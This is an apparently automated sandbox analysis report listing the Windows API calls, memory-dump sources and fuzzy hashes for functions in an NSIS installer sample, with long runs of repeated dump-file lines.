                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                            • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                            • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                                                                                                                                            • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                            • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                                                                                                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                                                                                                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                                                                                                                                            • Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                                                                                                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2584051700-0
                                                                                                                                                                            • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                            • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                            Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                            • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                            • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                                                                                                                                            • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                            Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 2659869361-823278215
                                                                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                            • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                            Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                            • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                                                                                                                                            Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3248276644-823278215
                                                                                                                                                                            • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                                                                                                                                            • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                            • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                                                                                                                                            Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040550C
